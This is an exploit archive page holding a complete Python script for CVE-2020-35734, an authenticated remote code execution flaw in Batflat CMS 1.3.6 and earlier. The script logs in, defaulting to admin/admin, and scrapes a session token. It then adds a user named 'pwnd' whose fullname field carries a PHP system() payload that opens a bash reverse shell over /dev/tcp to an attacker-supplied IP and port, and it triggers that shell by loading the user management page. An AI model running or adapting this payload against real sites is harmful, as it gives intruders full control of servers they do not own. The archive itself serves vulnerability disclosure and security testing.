what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Batflat CMS 1.3.6 Remote Code Execution

Batflat CMS 1.3.6 Remote Code Execution
Posted Feb 18, 2021
Authored by mari0x00

Batflat CMS versions 1.3.6 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2020-35734
SHA-256 | 551ecbbad242bc4ac6d5348660133e01326441008828d7ad9b59fbd7682668a3

Batflat CMS 1.3.6 Remote Code Execution

Change Mirror Download
# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
# Date: 2020-12-27
# Exploit Author: mari0x00
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/
# Version: <= 1.3.6
# CVE: CVE-2020-35734

#!/usr/bin/python3

import requests
import sys
import re
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep

print(colored('''###########################################################''',"red"))
print(colored('''####### Batflat authenticated RCE by mari0x00 #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")

if len(sys.argv) != 6:
print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red")))
print((colored("[~] Default credentials: admin/admin","red")))
print((colored("[~] Example: python3 batpwnd.py https://192.168.101.105/ admin admin 192.168.101.101 4444","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]


#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}


#Authenticate
print((colored("[+] Attempting user login","blue")))

login_data = {
"username": username,
"password": password,
"login": "",
}

login = s.post(url+"admin/", login_data, headers=headers)
sleep(0.5)

#Get token
print((colored("[+] Retrieving the token","blue")))
r = s.get(url+"admin/", headers=headers).content
soup = BeautifulSoup(r, "lxml")
token = (re.search(r't=(.*?)">Add', str(soup)).group(1))
print((colored("[+] Token ID: " + token,"blue")))
sleep(0.5)

#Get URL
print((colored("[+] Getting the add-user endpoint URL","blue")))
r = s.get(url+"admin/users/add?t="+token, headers=headers).content
soup = BeautifulSoup(r, "lxml")
add_user_url = (re.search(r'action="(.*?)"', str(soup)).group(1))
sleep(0.5)

#Exploit
print((colored("[+] Adding pwnd user","blue")))
payload = "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1'\");?>"

add_user = {
"username": (None, "pwnd"),
"fullname": (None, payload),
"description": (None, "pwnd"),
"email": (None, "pwnd@evil.com"),
"password": (None, "pwnd123"),
"access[]": (None, "users"),
"save": (None, "Save")
}

exploit = s.post(add_user_url, headers=headers, files=add_user)
sleep(0.5)

#Triggering reverse shell
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin/users/manage?t="+token, headers=headers)

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close